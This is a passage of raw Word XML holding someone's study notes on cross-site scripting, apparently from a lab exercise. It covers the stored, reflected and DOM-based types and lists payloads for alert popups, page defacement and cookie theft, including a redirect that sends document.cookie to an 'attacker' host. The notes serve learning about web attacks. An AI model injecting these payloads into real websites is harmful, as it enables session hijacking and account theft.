          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Typically found in web application – type of injection that allows attackers to execute malicious scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1196925B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Vulnerable if it uses unsanitized user input – possible in JS, VBScript, Flash and CSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58796A0D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Stored XSS – most dangerous type – malicious string originates from website database – often happens when a website allows user input that is not sanitized when inserted into database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E64904" w14:textId="6A2B5443" w:rsidR="00DC7D6C" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Reflected XSS – part of the victims request to the website. Website includes payload in response back to the user. Attacker needs to trick a victim into clicking a URL to execute their malicious payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4C7D3C" w14:textId="77554F86" w:rsidR="006D36AB" w:rsidRDefault="006D36AB" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>most common type of XSS attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED8B201" w14:textId="4D36E97B" w:rsidR="006D36AB" w:rsidRDefault="006D36AB" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Social Engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA7FA56" w14:textId="213714BA" w:rsidR="006D36AB" w:rsidRDefault="006D36AB" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Attack crafts URL containing malicious payload and sends to victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5922DE03" w14:textId="283FDC5E" w:rsidR="006D36AB" w:rsidRDefault="006D36AB" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:hyperlink r:id="rId67" w:history="1">
        <w:r w:rsidRPr="00F1758D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://example.com/search?keyword=&lt;script&gt;...&lt;/script</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006D36AB">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62236546" w14:textId="3EB11999" w:rsidR="006D36AB" w:rsidRDefault="006D36AB" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Malicious website includes payload from request in response to the user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2FD6CE" w14:textId="255C1F76" w:rsidR="006D36AB" w:rsidRDefault="006D36AB" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>victims browser executes payload inside response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2FB0BB" w14:textId="7971619D" w:rsidR="006D36AB" w:rsidRPr="00F512ED" w:rsidRDefault="006D36AB" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>data is gathered by script and sent back to attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518C058E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>DOM-Based XSS – Document Object Model – programming interface for HTML and XML documents – represents the page so programs can change document structure, style, content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BDF008" w14:textId="6FC30F67" w:rsidR="00DC7D6C" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>XSS Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3B7168" w14:textId="77777777" w:rsidR="006D36AB" w:rsidRDefault="006D36AB" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Reflective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AE1569" w14:textId="360A2BB4" w:rsidR="00DC7D6C" w:rsidRPr="006D36AB" w:rsidRDefault="00DC7D6C" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="006D36AB">
        <w:t>Popup's (&lt;script&gt;alert(“Hello World”)&lt;/script&gt;) - Creates a Hello World message popup on a users browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397820F5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="006D36AB" w:rsidRDefault="00DC7D6C" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="006D36AB">
        <w:lastRenderedPageBreak/>
        <w:t>alert“window.location.hostname”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5095193D" w14:textId="5EE914C6" w:rsidR="00DC7D6C" w:rsidRDefault="00DC7D6C" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F0512">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>REFLECTIVE USE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210212CD" w14:textId="77777777" w:rsidR="006D36AB" w:rsidRPr="006D36AB" w:rsidRDefault="006D36AB" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Stored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F628E2" w14:textId="32BD3E0C" w:rsidR="00DC7D6C" w:rsidRPr="006D36AB" w:rsidRDefault="00DC7D6C" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F0512">
        <w:t>Writing HTML (document.write) - Override the website's HTML to add your own (essentially defacing the entire page).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388B12E9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="000F0512" w:rsidRDefault="00DC7D6C" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000F0512">
        <w:t>Once account is registered and comments are allowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A613FF3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="000F0512" w:rsidRDefault="00DC7D6C" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000F0512">
        <w:t>Use HTML brackets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDF2CD0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="000F0512" w:rsidRDefault="00DC7D6C" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000F0512">
        <w:t>Ex. &lt;h3&gt;HELLO&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC6F1BD" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="000F0512" w:rsidRDefault="00DC7D6C" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000F0512">
        <w:t>STORED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E34D91F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="006D36AB" w:rsidRDefault="00DC7D6C" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="006D36AB">
        <w:t>Create an alert popup box appear on the page with document cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7A3EAC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="006D36AB" w:rsidRDefault="00DC7D6C" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="006D36AB">
        <w:t>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C3201B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="006D36AB" w:rsidRDefault="00DC7D6C" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="006D36AB">
        <w:t>Change “XSS Playground” to “I am a hacker” by adding a comment and using JS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B37A90" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="000F0512" w:rsidRDefault="00DC7D6C" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000F0512">
        <w:t>Inspect Element and Find Code for Specific Piece to be Replaced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5071961E" w14:textId="33D7DF0D" w:rsidR="00DC7D6C" w:rsidRPr="000F0512" w:rsidRDefault="00DC7D6C" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000F0512">
        <w:t>&lt;script&gt;document.querySelector(‘&lt;tag to be edited&gt;).textContent = 'I am a hacker'&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B94C3F2" w14:textId="0440BC2C" w:rsidR="00E442B7" w:rsidRPr="000F0512" w:rsidRDefault="00E442B7" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000F0512">
        <w:t>&lt;script&gt;document.getElementById(‘’).innerHTML=&lt;phrase&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427F852E" w14:textId="5AB81920" w:rsidR="00E442B7" w:rsidRPr="000F0512" w:rsidRDefault="008428E1" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000F0512">
        <w:t>Steal victim cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A8D06B" w14:textId="5BF1A481" w:rsidR="000F0512" w:rsidRPr="000F0512" w:rsidRDefault="000F0512" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000F0512">
        <w:t>Practice Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0643D77C" w14:textId="6040CB18" w:rsidR="000F0512" w:rsidRPr="000F0512" w:rsidRDefault="000F0512" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000F0512">
        <w:t>&lt;img src="javascript:'/log/' + document.cookie" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BC3694" w14:textId="4628BAC4" w:rsidR="000F0512" w:rsidRDefault="000F0512" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000F0512">
        <w:t>will steal users cookie and send it to logs page without redirecting user, which would raise suspicion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2391C008" w14:textId="7DABE770" w:rsidR="000F0512" w:rsidRDefault="000F0512" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>URL/logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DA9EAF" w14:textId="2B5741DE" w:rsidR="000F0512" w:rsidRPr="000F0512" w:rsidRDefault="000F0512" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>copy paste Cookie into Storage in Inspect Element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2188B241" w14:textId="5D2D71A3" w:rsidR="000F0512" w:rsidRPr="000F0512" w:rsidRDefault="000F0512" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000F0512">
        <w:t>Real World Example – Set up Web Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72305AE0" w14:textId="76E4806C" w:rsidR="008428E1" w:rsidRPr="000F0512" w:rsidRDefault="008428E1" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000F0512">
        <w:t>&lt;script&gt;window.location='http://attacker/?cookie='+document.cookie&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371F9D9B" w14:textId="7AD2C53A" w:rsidR="008428E1" w:rsidRDefault="008428E1" w:rsidP="006D36AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000F0512">
        <w:t>script navigates users browser to different URL, new request will include victim cookie as a query parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E541E7" w14:textId="0A7E7DBD" w:rsidR="00841C8D" w:rsidRDefault="00841C8D" w:rsidP="00841C8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DOM-Based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AA6AA4" w14:textId="1B77EE88" w:rsidR="00841C8D" w:rsidRDefault="00841C8D" w:rsidP="00841C8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>malicious payload is not parsed by browser until websites legitimate JS is executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63068571" w14:textId="656EDB08" w:rsidR="00841C8D" w:rsidRDefault="00841C8D" w:rsidP="00841C8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>reflected – payload inject directly on the website and will not matter when other JS gets loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D5B512" w14:textId="58DF2CBE" w:rsidR="00841C8D" w:rsidRDefault="00841C8D" w:rsidP="00841C8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Payload will only execute when the vulnerable JS code is either loaded or interacted with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381B4782" w14:textId="23AEC648" w:rsidR="00841C8D" w:rsidRDefault="00841C8D" w:rsidP="00841C8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>inspect source code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F97347" w14:textId="02124832" w:rsidR="00841C8D" w:rsidRDefault="00841C8D" w:rsidP="00841C8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script&gt; sections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCA6B25" w14:textId="000F005E" w:rsidR="00841C8D" w:rsidRDefault="00841C8D" w:rsidP="00841C8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>div element that will contain a tag (such as img on a page that allows image uploads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8DD8AF" w14:textId="1DA69B87" w:rsidR="003A68DF" w:rsidRDefault="003A68DF" w:rsidP="003A68DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="003A68DF">
        <w:t>imgdiv.innerHTML = '&lt;img src="' + imgURL + '" alt="Image not found.." width=400&gt;' // Creating image element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D581AB7" w14:textId="5D22FE35" w:rsidR="00841C8D" w:rsidRDefault="00841C8D" w:rsidP="00841C8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>anything typed into this text area will be stored in said variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227F0C99" w14:textId="3A4CC126" w:rsidR="00841C8D" w:rsidRDefault="00841C8D" w:rsidP="00841C8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
